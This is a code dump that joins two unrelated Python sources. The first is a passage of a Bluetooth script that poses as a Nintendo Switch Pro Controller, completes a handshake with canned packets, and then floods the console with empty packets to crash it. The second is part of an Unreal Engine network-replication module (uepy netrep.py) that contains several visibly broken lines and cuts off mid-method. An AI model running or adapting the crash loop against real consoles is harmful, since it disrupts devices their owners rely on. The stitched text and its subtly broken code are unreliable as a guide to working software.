b'\xA1\x21\xEE\x40\x00\x00\x00\x10\xD8\x75\x43\x87\x73\x0C\x90\x10\x80\x60\x00\x00\x18\x50\xFD\x00\x00\xC6\x0F\x0F\x30\x61\x96\x30\xF3\xD4\x14\x54\x41\x15\x54\xC7\x79\x9C\x33\x36\x63\x00\x00\x00\x00\x00' FACTORY_PARAMS_2 = b'\xA1\x21\x15\x40\x00\x00\x00\x11\x18\x76\x45\x97\x73\x0B\x90\x10\x98\x60\x00\x00\x12\x0F\x30\x61\x96\x30\xF3\xD4\x14\x54\x41\x15\x54\xC7\x79\x9C\x33\x36\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' USER_CAL = 
b'\xA1\x21\x49\x40\x00\x00\x00\x12\x08\x76\x43\xA7\x73\x0A\x90\x10\x10\x80\x00\x00\x18\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00' FACTORY_CAL = b'\xA1\x21\x65\x40\x00\x00\x00\x0F\x38\x76\x46\x87\x73\x0A\x90\x10\x3D\x60\x00\x00\x19\x31\x96\x61\xEA\xE7\x73\xA4\xF5\x5D\x55\x27\x75\xA7\xD5\x5B\x3A\x16\x59\xFF\x32\x32\x32\xFF\xFF\xFF\x00\x00\x00\x00' SIX_AXIS_CAL = b'\xA1\x21\x8D\x40\x00\x00\x00\x10\x08\x76\x44\x67\x73\x08\x90\x10\x20\x60\x00\x00\x18\x32\x00\xFA\xFE\x38\x01\x00\x40\x00\x40\x00\x40\x03\x00\xEE\xFF\xD9\xFF\x3B\x34\x3B\x34\x3B\x34\x00\x00\x00\x00\x00' ENABLE_IMU = b'\xA1\x21\xBB\x40\x00\x00\x00\x11\x08\x76\x45\x87\x73\x02\x80\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ENABLE_VIBRATION = b'\xA1\x21\xDD\x40\x00\x00\x00\x0F\x18\x76\x43\x87\x73\x09\x80\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SET_NFC_IR = b'\xA1\x21\x13\x40\x00\x00\x00\x0E\x08\x76\x45\x77\x73\x00\xA0\x21\x01\x00\xFF\x00\x03\x00\x05\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5C' SET_PLAYER_LIGHTS = b'\xA1\x21\x35\x40\x00\x00\x00\x10\x08\x76\x43\x67\x73\x0B\x80\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' IDLE_PACKET = b'\xA1\x30\xBA\x40\x00\x00\x00\x0F\xD8\x75\x43\x97\x73\x09\xD5\xFA\x3C\xFC\xCD\x0E\x19\x00\xE1\xFF\xDD\xFF\xCD\xFA\x3A\xFC\xCE\x0E\x18\x00\xDF\xFF\xDB\xFF\xCA\xFA\x3C\xFC\xD3\x0E\x19\x00\xDD\xFF\xDB\xFF' COMMANDS = [ REQUEST_INFO, SET_SHIPMENT, SERIAL_NUMBER, COLOURS, INPUT_MODE, TRIGGER_BUTTONS, FACTORY_PARAMS, FACTORY_PARAMS_2, USER_CAL, FACTORY_CAL, SIX_AXIS_CAL, ENABLE_IMU, ENABLE_VIBRATION, SET_NFC_IR, ] def format_message(data, split, name): """Formats 
    a given byte message in hex format split into payload
    and subcommand sections.

    :param data: A series of bytes
    :type data: bytes
    :param split: The location of the payload/subcommand split
    :type split: integer
    :param name: The name featured in the start/end messages
    :type name: string
    :return: The formatted data
    :rtype: string
    """
    payload = ""
    subcommand = ""
    for i in range(0, len(data)):
        # Render each byte as a zero-padded, uppercase hex pair.
        data_byte = str(hex(data[i]))[2:].upper()
        if len(data_byte) < 2:
            data_byte = "0" + data_byte
        # Bytes up to and including `split` belong to the payload section.
        if i <= split:
            payload += "0x" + data_byte + " "
        else:
            subcommand += "0x" + data_byte + " "

    formatted = (
        f"--- {name} Msg ---\n" +
        f"Payload: {payload}\n" +
        f"Subcommand: {subcommand}")
    return formatted


def print_msg_controller(data):
    """Prints a formatted message from a controller

    :param data: The bytes from the controller message
    :type data: bytes
    """
    print(format_message(data, 13, "Controller"))


def print_msg_switch(data):
    """Prints a formatted message from a Switch

    :param data: The bytes from the Switch message
    :type data: bytes
    """
    print(format_message(data, 10, "Switch"))


if __name__ == "__main__":
    # L2CAP PSMs used by the Switch: 17 = HID control, 19 = HID interrupt.
    port_ctrl = 17
    port_itr = 19

    toggle_input_plugin(False)

    bt = BlueZ(adapter_path="/org/bluez/hci0")
    controller = Controller(bt, PRO_CONTROLLER)
    controller.setup()

    # Switch sockets
    switch_itr = socket.socket(family=socket.AF_BLUETOOTH,
                               type=socket.SOCK_SEQPACKET,
                               proto=socket.BTPROTO_L2CAP)
    switch_ctrl = socket.socket(family=socket.AF_BLUETOOTH,
                                type=socket.SOCK_SEQPACKET,
                                proto=socket.BTPROTO_L2CAP)

    try:
        switch_ctrl.bind((bt.address, port_ctrl))
        switch_itr.bind((bt.address, port_itr))

        # bt.set_alias("Joy-Con (L)")
        bt.set_alias("Pro Controller")
        bt.set_discoverable(True)

        print("Waiting for Switch to connect...")
        switch_itr.listen(1)
        switch_ctrl.listen(1)

        client_control, control_address = switch_ctrl.accept()
        print("Got Switch Control Client Connection")
        client_interrupt, interrupt_address = switch_itr.accept()
        print("Got Switch Interrupt Client Connection")

        # Creating a non-blocking client interrupt connection
        fcntl.fcntl(client_interrupt, fcntl.F_SETFL, os.O_NONBLOCK)

        print("Connecting to Switch...")
        # Handshake loop: answer each Switch subcommand with the next canned
        # reply; send idle input reports otherwise, at roughly 15 Hz.
        while True:
            try:
                reply = client_interrupt.recv(350)
                # print_msg_switch(reply)
            except BlockingIOError:
                reply = None

            # Heuristic: replies longer than 40 bytes are subcommand requests.
            if reply and len(reply) > 40:
                client_interrupt.sendall(COMMANDS.pop(0))
            else:
                client_interrupt.sendall(IDLE_PACKET)

            if len(COMMANDS) == 0:
                break

            time.sleep(1/15)

        print("Crashing Switch...")
        # Post-handshake: flood the Switch with empty (malformed) packets.
        while True:
            try:
                reply = client_interrupt.recv(350)
            except BlockingIOError:
                reply = None

            client_interrupt.sendall(b'')
            time.sleep(1/15)
    except KeyboardInterrupt:
        print("Closing sockets")
        switch_itr.close()
        switch_ctrl.close()
        # os._exit as a fallback in case sys.exit is intercepted.
        try:
            sys.exit(1)
        except SystemExit:
            os._exit(1)
    except OSError as e:
        print("Closing sockets")
        switch_itr.close()
        switch_ctrl.close()
        raise e
    finally:
        # Always restore the input plugin, even on error paths.
        toggle_input_plugin(True)
dfb/uepy
Content/Scripts/uepy/netrep.py
''' Python side of network replication (aka NetRep or NR) code. Misc info/notes:
- Any object (not just actors) can declare itself as replicated and send/receive network messages;
  each object that does so needs to have a unique network name/ID known as the netID.
- Replicated objects declare an optional 'repProps' Bag that lists all its replicated properties
  and their default values.
- Replicated objects have an OnReplicated method that is called once the object is fully
  replicated; for replicated actors, this is effectively BeginPlay (and they should generally not
  use BeginPlay at all).
- Replicated objects can optionally declare that they depend on other replicated objects in order
  to function properly, in which case OnReplicated is not called until those other objects have
  fully replicated first. Use self.NRSetDependencies(*deps) where each dependency can be a
  NetReplicated object or the name of a property on self that holds a reference to a NetReplicated
  object. So the host might do something like the following in its OnReplicated method:
    self.foo = Foo() # Foo is a NetReplicated object
    self.NRSetDependencies('foo')
  and then on the client, when OnReplicated is called, self.foo will reference that same Foo
  instance, and OnReplicated will be called only after foo fully replicates. It is up to
  application code to avoid dependency loops. Note that these are not repProps, so they are
  accessible via self.x and not self.nr.x. Also note that right now the usefulness of dependencies
  is somewhat limited because if NR is in charge of spawning the object client side, it must
  support a no-args constructor call.
- Replicated objects are spawned across the network in 3 different ways:
    - Engine - a core engine object such as gamestate or the player's pawn. Engine spawns on the
      host and on the client, and then we link it into the NR subsystem.
      Hopefully there are very few of these: we need them because we don't yet know of a way for
      us to be in charge of replicating their spawn but still have them work completely with the
      engine's innards, and we don't have control over the order in which these get spawned on
      clients.
    - NR - any sort of game-specific replicated object. Engine spawns on the host and we link it
      into NR, and then send an NR message to all clients with instructions on how to spawn
      instances on the client and link those instances to the one on the host.
    - App - for replicated objects that get spawned "on their own", e.g. some replicated parts of
      the UI or something where the spawning of some other object causes these to be spawned (such
      that we don't want the engine or NR to take care of spawning them separately) but that we
      still want to be able to send/receive replication messages and to have state sync'd across
      machines.
  Outside of *how* the objects are spawned, replication works pretty much exactly the same in all
  cases. A huge amount of the complexity of this module is due to engine-spawned objects (i.e.
  synchronizing replicated object creation between two different replication systems) so it would
  be nice to eventually not need it.
- In order for an object on the host and a corresponding object on a client to know they are the
  "same" object, both must register with NR (via self.NRRegister) in their __init__ function,
  using a name (aka 'netID') that is the same on both machines. The exception is for NR-spawned
  objects on the client: they should /not/ call NRRegister because they are registered
  automatically. Engine-spawned objects (such as the pawn) automatically have their engine netGUID
  appended to their netID (e.g.
  if you register with a name 'pawn' then it'll internally be registered as something like
  'pawn_5') - this frees the application code from trying to figure out how to uniquely identify
  instances and helps avoid a chicken-and-egg problem on clients (them needing to register using a
  unique ID prior to them having any information from the host that could be used to uniquely
  identify themselves). So:
    - for engine-spawned: on host and clients call NRRegister in __init__ using a name that
      basically indicates the type ('vrpawn')
    - for NR-spawned: on host call NRRegister in __init__ with a unique name (e.g.
      myactor_234523453)
    - for app-spawned: on host and clients call NRRegister in __init__ using a unique name both
      sides know (e.g. 'mygamestate')
- A common pattern when the user is directly generating replication events (e.g. moving an object
  around) is to send throttled, unreliable events while the user interaction is underway, and then
  once the user is done, send a final, reliable, and unthrottled event so that everyone has the
  correct final value. In order to make this work (and because UE4 sends messages over UDP),
  application code needs to call NRStartMixedReliability once before the first
  intermediate/unreliable message goes out.
- Non-Actor replicated objects should call self.NRUnregister() when they are being destroyed.

TODO:
- with a lot of the binary data handling, we make unnecessary copies of the data - it'd be better
  to use byte arrays / memoryviews (or at the very least, struct.unpack_from)
- figure out some way to do creation of dependent child objects that take init parameters.
- splitting data marshalling into format type codes and encoded data blob has a low ROI. It would
  be better to keep the two merged. We probably want it for array support anyway.
- for everything except object refs, self.nr.pre_<name> to get the value from before the change?
  (and with obj refs, we just don't want to keep objs alive, so it could be a weak ref in that
  case)
- for data type codes, use an enum instead of a char, and then use a set high bit to mean "array"
  and add support for replicating arrays.
    - probably ok to limit max len to 255
    - probably /not/ ok to require all same type (think lists with None, but maybe that's the only
      exception?)
    - the diff format could be something like
      <1B:action:add/update/remove><1B:index>[for add/update: <1B:datatype><1B marshalled value>]
    - NRUpdate could detect the changes only if the caller doesn't modify the array exactly, e.g.
        foo = self.nr.foo
        foo.append(x)
        self.NRUpdate(foo=foo)
      wouldn't detect any changes, so we'd need to always use 'foo = self.nr.foo[:]' - maybe
      that's not too big a deal to require that?
    - maybe we should instead (or additionally) support ways to tell NRUpdate the modification we
      want to make, e.g.
        self.NRUpdate(foo__append=x)
        self.NRUpdate(foo__pop=2)
        self.NRUpdate(foo__remove=x)
        self.NRUpdate(foo=[1,2,3]) # still allow this, but doesn't try to diff and unconditionally resends all
      we don't need to support every possible use of arrays; instead focus on likely/recommended
      uses of replicated arrays
    - once you support arrays, might as well add support for dictionaries and sets! (and the
      var__action=X form would work well for them)
- when the host leaves, the clients don't clean up all the host-spawned objects (not really sure
  if they should or what)
'''

from uepy import *
from uepy.enums import *
import struct, weakref, time, random, inspect

# NOTE(review): this appears to be uepy's Enum (from uepy.enums), not the
# stdlib enum.Enum — members are plain ints assigned via range(); confirm.
class ENRBridgeMessage(Enum):
    NONE, SigDef, SetChannelInfo, ObjInitialState, Call, Unregister = range(6)

class SignatureDefinitionManager:
    '''Helper for managing "signature definitions", which are simply mappings between strings and
    uint16 IDs. In a nutshell, there are a lot of strings we would send over the wire many times
    for a given application, so we instead map those strings to IDs and send the IDs instead.
    What makes it interesting/tricky is that we don't know the set of strings until they are about
    to be sent.

    SigDefs are to address the following problem:
    - we don't want to force developers to declare up front every network API call and the
      combination of all parameter types that might be used
    - we also don't want to constantly transmit type information since it's a lot of overhead

    In theory the set of strings the might be sent is "infinite" (for example, for strings
    representing type information for function call parameters), but in practice and for a given
    application, the set of strings used is actually relatively small - there are only so many
    method names and parameter type info combinations that an application will use.

    Because sigdefs are completely dynamic (they don't exist until the moment a mappable string is
    about to be sent over the wire), they are not only shared across channels, there are not even
    shared across directions on the same channel, so each channel has a set of sigdefs for sending
    as well as receiving.'''
    def __init__(self, channel):
        self.channel = channel # so we can send out the new mappings as they get created
        self.s2n = {} # string -> numerical ID
        self.n2s = {} # numerical ID -> string

    def Set(self, n, s):
        '''Used by channels when they receive a signature definition from the other side'''
        self.s2n[s] = n
        self.n2s[n] = s

    def IDForString(self, s):
        '''Given some string, returns an ID for it, creating it if needed.'''
        n = self.s2n.get(s)
        if n is None:
            # Create a new entry, and immediately (reliably) inform the other
            # side of the new mapping so it can decode subsequent messages.
            n = len(self.s2n)
            self.s2n[s] = n
            self.n2s[n] = s
            payload = struct.pack('<BH', ENRBridgeMessage.SigDef, n) + s.encode('utf8')
            self.channel.AddMessage(payload, True)
        return n

    def StringForID(self, n):
        '''Inverse of IDForString. Raises KeyError if not found, though that should never happen.'''
        return self.n2s[n]

    @staticmethod
    def CreateFor(channel):
        # Attach independent send/receive sigdef maps to the given channel.
        channel.recvSigDefs = SignatureDefinitionManager(channel)
        channel.sendSigDefs = SignatureDefinitionManager(channel)

class NRAppBridge:
    '''Connects Python code to the netrep C++ code so that Python code can send NR messages and so
    that incoming messages can be routed to Python. On the C++ side is NRChannel, which is
    basically a socket - it sends and receives messages between two endpoints, without an
    understanding of what the data means.'''
    # Note: this code has both netIDs (strings) and netIDNums (uint32s). All code outside of this
    # class uses the former, while over the wire and internally in some places (for efficiency) we
    # use the latter.

    def __init__(self):
        self.ChannelIDChanged = Event() # fires (newchannelID) when it gets assigned on a client
        self.ClientJoined = Event() # fires (clientChannelID) when a connection is added
        self.Reset()

    def Reset(self):
        '''(Re)initializes all bridge state; also used when a client disconnects from a host.'''
        self.isHost = True # True until we learn otherwise (currently we don't get recreated when a client joins a host, so we detect dynamically)
        self.channelID = 0 # aka playerID or userID
        self.hostChannel = None # on clients, the UNRChannel to the host
        self.clientChannels = {} # on the host, all channels to connected clients, channelID -> UNRChannel instance
        self.lastCallTimes = {} # sigDefStr -> timestamp of last time we issued a remote call for it
        self.nextNetIDNum = 1 # the next net ID number we'll assign in a Register call. Only used on the host
        self.netIDToNum = {} # netID name --> numerical ID (a uint32) - nobody outside of the AppBridge knows/cares about numerical ID mapping
        self.numToNetID = {} # inverse of netIDToNum
        self.objs = {} # netID -> weakref to instance; we don't use netIDNum here because clients may register objects by netID prior to getting the netIDNum from the server
        self.dependencyWaiters = {} # netIDNum -> [list of (netIDNum waiting on it, attrName to use when assigning it to the waiter or '')]
        self.unconsumedState = {} # netIDNum -> Bag(.propValues, .dependencies) of replication state we've received but not yet "delivered"
        self.waitingForNetIDNum = {} # on clients, netID -> obj instance that has registered but the mapping has not yet arrived from the server
        self.deferredCalls = {} # unknown netIDNum -> [list of tuples of args for calling _ExecuteLocalCall for calls being held until the recipient replicates]

    def Register(self, obj, netID, spawnType:ENRSpawnReplicatedBy):
        '''Called by NetReplicated.NRRegister'''
        # For engine-wrapped objects, also adjust replication settings
        if hasattr(obj, 'engineObj'):
            e = obj.engineObj
            e.bAlwaysRelevant = True # we don't want the engine to do any relevancy checking
            e.SetReplicateMovement(False) # we never want this
            e.SetReplicates(spawnType == ENRSpawnReplicatedBy.Engine) # from the engine's perspective, it's a replicated actor only if the engine spawns it

        obj.nrSpawnType = spawnType
        if spawnType == ENRSpawnReplicatedBy.Engine:
            # For engine-spawned objects, on the host we auto-append their engine-assigned netGUID
            # to give them a unique name (without this, it becomes really difficult for app code
            # to communicate in time a unique name to client instances - they need to know a
            # unique name prior to them knowing how to come up with it).
            if self.isHost or hasattr(obj, '_nrDeferredNetID'): # if it does have this prop, it means BeginPlay is happening
                netGUID = GetOrAssignNetGUID(obj.GetWorld(), obj.engineObj)
                netID += '_%d' % netGUID
            else:
                # On clients, it's too early to ask the engine for the netGUID, so all we do for
                # now is save the netID for later auto-registration in BeginPlay.
                obj._nrDeferredNetID = netID
                return

        # NOTE: if we add more steps here that are relevant to instances on clients, be sure to
        # update _OnBridgeMessage_ObjInitialState accordingly
        if self.isHost:
            # Allocate a new netIDNum
            num = self.nextNetIDNum
            self.nextNetIDNum += 1
            self.netIDToNum[netID] = num
            self.numToNetID[num] = netID

        # Remember this object, and also set a few data members on it
        self.objs[netID] = weakref.ref(obj)
        obj.nrNetID = netID
        if spawnType == ENRSpawnReplicatedBy.App:
            obj._NRCheckStart() # otherwise, on the host, non-Actor subclasses will never call this

    def Unregister(self, *, netID=None, netIDNum=None):
        '''Flags this object as going away.
When called on the host, causes a message to be sent to all clients to also unregister it.''' if netID is not None: netIDNum = self.netIDToNum[netID] elif netIDNum is not None: netID = self.numToNetID[netIDNum] else: assert 0 # gotta supply one or the other if self.isHost: # Notify all clients that this object is unregistering payload = struct.pack('<BI', ENRBridgeMessage.Unregister, netIDNum) for chan in self.clientChannels.values(): chan.AddMessage(payload, True) # Forget everything about this object self.netIDToNum.pop(netID, None) self.numToNetID.pop(netIDNum, None) self.dependencyWaiters.pop(netIDNum, None) self.unconsumedState.pop(netIDNum, None) self.waitingForNetIDNum.pop(netID, None) ref = self.objs.pop(netID, None) # On clients, we need to kill off objects that are Actor subclasses that were not spawned by the engine if ref and not self.isHost: obj = ref() if obj and obj.nrSpawnType != ENRSpawnReplicatedBy.Engine: klass = obj.__class__ if issubclass(klass, AActor) or issubclass(AActor_PGLUE) or issubclass(type(klass), PyGlueMetaclass): obj.Destroy() def _OnBridgeMessage_Unregister(self, chan, payload): nrNetIDNum = struct.unpack('<I', payload) self.Unregister(netIDNum=nrNetIDNum) def OnMessage(self, chan, data): '''Called by NRChannel for each incoming message. Routes the message to internal handlers''' handlerName = '_OnBridgeMessage_%s' % ENRBridgeMessage.NameFor(data[0]) # all msgs have a ENRBridgeMessage value as the first byte getattr(self, handlerName)(chan, data[1:]) def SendInitialStateFor(self, obj, chan=None): '''Called on the host by all NetReplicated objects once they finish spawning (i.e. after returning from their OnReplicated call). 
        If chan is not None, the state is sent to a specific channel (for a late joining player),
        otherwise it is sent to all channels.'''
        assert self.isHost, obj
        if chan is None:
            channels = self.clientChannels.values()
        else:
            channels = [chan]
        if not channels:
            return # happens on host when stuff is spawned but there are no clients yet

        # Build up the message payload - if we add any more messages this convoluted, we should
        # probably write/get a helper lib
        parts = [] ; PA = parts.append

        # message type, spawn type, net ID num, and net ID len+data (so client can recreate the mapping)
        netIDNum = self.netIDToNum[obj.nrNetID]
        PA(struct.pack('<BBIB', ENRBridgeMessage.ObjInitialState, obj.nrSpawnType, netIDNum, len(obj.nrNetID)))
        PA(obj.nrNetID.encode('utf8'))

        # Create an ordered list of repProp values - no need for naming them since the receiving
        # side knows the same prop ordering
        # send the format string for repprops (len+str) and the blob of data (len+data) for it
        formatStr, propsBlob = ValuesToBin([obj.nr[k] for k in obj.nrPropNames])
        PA(struct.pack('<BH', len(formatStr), len(propsBlob)))
        PA(formatStr.encode('utf8'))
        PA(propsBlob)

        # Add info about replicated objects this object depends on. The format is super cheesy,
        # but easy to debug, and often not as inefficient as it looks since netIDs are 4 bytes but
        # rarely that many digits, especially in hex
        deps = [] # list of strings in the form '<netID>:<attrName or emptystr>'
        for netID, attrName in obj.nrDependencies:
            netIDNum = self.netIDToNum[netID]
            deps.append('%X:%s' % (netIDNum, attrName))
        depsStr = '|'.join(deps)
        PA(struct.pack('<H', len(depsStr)))
        PA(depsStr.encode('utf8'))

        # If the object is NR-spawned, we also need to include its class name so that the client
        # knows what to spawn
        if obj.nrSpawnType == ENRSpawnReplicatedBy.NR:
            className = obj.__class__.__name__
            PA(struct.pack('<B', len(className)))
            PA(className.encode('utf8'))

        # Send it!
        payload = b''.join(parts)
        for chan in channels:
            chan.AddMessage(payload, True)

    def OnChannelFromClient(self, chan):
        '''Called on the host when a channel to a client is connecting to us'''
        # Generate a unique ID for this new channel. This ID can be used as a player/user ID, so
        # there are advantages to keeping this number low, so scan for the next available channel
        # ID as opposed to just using a counter.
        usedIDs = self.clientChannels.keys()
        chanID = 1 # by convention, the host is always player 0, so clients are all >= 1
        while 1:
            if chanID in usedIDs:
                chanID += 1
            else:
                break
        chan.channelID = chanID
        SignatureDefinitionManager.CreateFor(chan)
        self.clientChannels[chanID] = chan

        # Sync state with the client by informing it of its channel ID and the state of all active
        # replicated objects
        chan.AddMessage(struct.pack('<BB', ENRBridgeMessage.SetChannelInfo, chanID), True)
        allObjs = []
        for netID, objRef in self.objs.items():
            obj = objRef()
            if obj:
                netIDNum = self.netIDToNum[obj.nrNetID]
                allObjs.append((netIDNum, obj))
        for netIDNum, obj in sorted(allObjs): # sorted so info gets sent in creation order
            self.SendInitialStateFor(obj, chan)
        self.ClientJoined.Fire(chanID)

    def OnChannelToHost(self, chan):
        '''Called by NRChannel when as a client we have connected to the host'''
        self.isHost = False # oh, hey, it turns out we're not the host after all
        SignatureDefinitionManager.CreateFor(chan)
        self.hostChannel = chan

    def OnChannelClosing(self, chan):
        '''Called by NRChannel when it is closing'''
        if self.isHost:
            self.clientChannels.pop(chan.channelID, None)
        else:
            # We are disconnecting, so now we are the host again (because we are now standalone),
            # so we need to reset
            self.Reset()

    def DoCall(self, recipient, where, methodName, args, reliable, maxCallsPerSec):
        '''Used by NetReplicated to carry out the call logic'''
        if where == ENRWhere.NONE:
            log('WARNING: NRCall to nowhere', recipient, methodName, args)
            return

        channels = set() # channels that will receive the message
        outboundWhere = ENRWhere.NONE # If we do make a remote call, the 'where' value to send in that call
        runLocal = False
        if self.isHost:
            # When called on the host, the valid outcomes are a combination of running locally,
            # telling all channels to run locally, telling one specific channel to run locally.
            if where & ENRWhere.USER:
                chanID = where - ENRWhere.USER
                if chanID == self.channelID:
                    runLocal = True # caller wants it to run on a specific user, and the host is that user
                else:
                    chan = self.clientChannels.get(chanID)
                    if chan:
                        channels.add(chan)
                        outboundWhere |= ENRWhere.Local
            else:
                if where & ENRWhere.Local:
                    runLocal = True
                if where & ENRWhere.Host:
                    runLocal = True # cuz we are the host
                if where & ENRWhere.NotMe:
                    channels.update(self.clientChannels.values())
                    outboundWhere |= ENRWhere.Local
        else:
            # When called on a client, the valid outcomes are a combination of running locally,
            # telling the host to run locally, telling the host to tell all channels (minus this
            # one) to run locally, or telling the host to tell one specific channel to run
            # locally.
            callHost = False
            if where & ENRWhere.USER:
                chanID = where - ENRWhere.USER
                if chanID == self.channelID:
                    runLocal = True # caller wants it to run on a specific user, and we are that user
                else:
                    callHost = True
                    outboundWhere = where # stomp any prior values and set it to userID + user bit
            else:
                if where & ENRWhere.Local:
                    runLocal = True
                if where & ENRWhere.Host:
                    callHost = True
                    outboundWhere |= ENRWhere.Local
                if where & ENRWhere.NotMe:
                    callHost = True
                    outboundWhere |= ENRWhere.All # the receiving side knows this should not include our channel since we're the caller
            if callHost:
                channels.add(self.hostChannel)

        # Make any remote calls
        if channels:
            recipientID = self.netIDToNum[recipient.nrNetID]
            formatStr, blob = ValuesToBin(args)
            fullSig = methodName + '|' + formatStr
            sendMessage = True
            if maxCallsPerSec > 0:
                # Caller wants throttling of remote calls enabled so as to not flood the network
                # (local calls are never throttled though).
                # Right now the throttling is pretty blunt and simply doesn't allow two calls to
                # the same signature (method name + arg types) to happen within a timeframe that
                # exceeds the overall rate, but if needed we could add something a bit smarter
                # that e.g. allows some fast back-to-back calls as long as they don't exceed some
                # number per second overall.
                now = time.time()
                lastCall = self.lastCallTimes.get(fullSig, 0)
                nextAllowedTime = lastCall + 1.0/maxCallsPerSec
                if now < nextAllowedTime:
                    sendMessage = False
                else:
                    self.lastCallTimes[fullSig] = now

            if sendMessage:
                mixedSessionID = recipient.NRGetMixedReliabilitySessionID(methodName, reliable)
                for chan in channels:
                    sigDefID = chan.sendSigDefs.IDForString(fullSig)
                    payload = struct.pack('<BBHIBB', ENRBridgeMessage.Call, outboundWhere, sigDefID, recipientID, mixedSessionID, reliable) + blob
                    chan.AddMessage(payload, reliable)
                    # (Yes, we really do want to pass reliable as a parameter to send in the call
                    # and also as a parameter *to* _Send)

        # Call locally - we do this after any remote calls so that if the local call triggers more
        # NR calls, they will also be sent to the remote machines in the same order
        if runLocal:
            self._DoLocalCall(recipient, methodName, args)

    def _OnBridgeMessage_SigDef(self, chan, payload):
        '''Called when we receive a sigdef from the other side of the channel'''
        sigDefID = struct.unpack('<H', payload[:2])[0]
        sigDef = str(payload[2:], 'utf8')
        chan.recvSigDefs.Set(sigDefID, sigDef)

    def _OnBridgeMessage_SetChannelInfo(self, chan, payload):
        '''Called on client to inform it of its channel/player/user ID'''
        assert not self.isHost
        self.channelID = payload[0]
        self.ChannelIDChanged.Fire(self.channelID)

    def _OnBridgeMessage_ObjInitialState(self, chan, payload):
        '''Called on client to replicate the initial state of an actor. If the object is
        NR-spawned, also causes the object to be spawned.'''
        # Parse this mess in the least efficient way possible
        # (wire layout mirrors SendInitialStateFor; each field is sliced off the front of payload)
        spawnType, netIDNum, netIDLen = struct.unpack('<BIB', payload[:6])
        payload = payload[6:]
        netID = str(payload[:netIDLen], 'utf8')
        payload = payload[netIDLen:]
        formatStrLen, propsBlobLen = struct.unpack('<BH', payload[:3])
        payload = payload[3:]
        formatStr = str(payload[:formatStrLen], 'utf8')
        payload = payload[formatStrLen:]
        propsBlob = payload[:propsBlobLen]
        payload = payload[propsBlobLen:]
        depsStrLen = struct.unpack('<H', payload[:2])[0]
        payload = payload[2:]
        depsStr = str(payload[:depsStrLen], 'utf8')
        payload = payload[depsStrLen:]
        deps = []
        if depsStr:
            # Each dependency is '<netIDNum in hex>:<attrName or empty>'
            for dep in depsStr.split('|'):
                depNetIDNum, attrName = dep.split(':')
                depNetID = self.numToNetID[int(depNetIDNum, 16)]
                deps.append((depNetID, attrName))
        className = None
        if spawnType == ENRSpawnReplicatedBy.NR:
            classNameLen = payload[0]
            className = str(payload[1:classNameLen+1], 'utf8')
            payload = payload[1+classNameLen:]

        # Set up the same mapping the host has for this object
        self.netIDToNum[netID] = netIDNum
        self.numToNetID[netIDNum] = netID

        # Save the state and dependency information so it can later be attached to the actors
        propValues = BinToValues(formatStr, propsBlob)
        self.unconsumedState[netIDNum] = Bag(propValues=propValues, dependencies=deps)

        obj = None
        if className is not None:
            # It's an NR-spawned object, so spawn it now. It doesn't necessarily know its own
            # netID, so we take care of registration on its behalf.
            klass = NRTrackerMetaclass.All.get(className)
            assert klass, 'Unable to find class to spawn: ' + className
            if issubclass(klass, AActor) or issubclass(klass, AActor_PGLUE) or issubclass(type(klass), PyGlueMetaclass):
                # If it's an engine class of one of the Python quasi-subclasses of an engine
                # class, we need to use an engine API to spawn it (though I guess SpawnActor
                # wouldn't work for U-subclasses)
                obj = SpawnActor(GetWorld(), klass)
            else:
                obj = klass()
            obj.nrNetID = netID
            obj.nrSpawnType = spawnType
            self.objs[netID] = weakref.ref(obj)
        else:
            ref = self.objs.get(netID)
            if ref:
                obj = ref()

        # If we know about the object (either because we just spawned it above, or because it
        # already registered itself), trigger it to consume its initial state. If we don't know
        # about the obj in question, it just means that at some point it'll show up and it will
        # call checkstart on its own.
        if obj:
            obj._NRCheckStart()

    def _OnBridgeMessage_Call(self, senderChannel, payload):
        '''The receiving side of a NetReplicated.NRCall -> bridge.DoCall sequence.
Runs it locally and/or passes it on to other clients.''' where, sigDefID, recipientID, mixedSessionID, reliable = struct.unpack('<BHIBB', payload[:9]) blob = payload[9:] runLocal = False sigDef = senderChannel.recvSigDefs.StringForID(sigDefID) if self.isHost: # When a message is received on the host, valid outcomes are to run it locally, to forward it on to all channels # except for the one that sent the message, or to forward it on to one specific channel channels = [] # Channels we'll forward the message to if where & ENRWhere.USER: chanID = where - EWhere.USER if chanID == self.channelID: runLocal = True else: # The requested channel is some other machine, so forward it on chan = self.clientChannels.get(chanID) if chan: channels.append(chan) else: if where & ENRWhere.Local: runLocal = True if where == ENRWhere.All: # forward it to all clients *except* the caller senderID = senderChannel.channelID for chanID, chan in self.clientChannels.items(): if chanID != senderID: channels.append(chan) # Tell the channels we're forwarding to to run it locally for chan in channels: sigDefID = chan.sendSigDefs.IDForString(sigDef) payload = struct.pack('<BBHIBB', ENRBridgeMessage.Call, ENRWhere.Local, sigDefID, recipientID, mixedSessionID, reliable) + blob # we include 'reliable' here only cuz the msg format wants it chan.AddMessage(payload, reliable) else: # When a message is received on a client, the only valid scenario is a command to run it locally if where != ENRWhere.Local: log('ERROR: client received a remote call with a non-local destination:', where) else: runLocal = True if runLocal: # Find the recipient and call it, if it is known. If it is an unknown recipient, we assume the call is for an object # that will be replicated soon, so we'll add it to a list of calls to delay until then. 
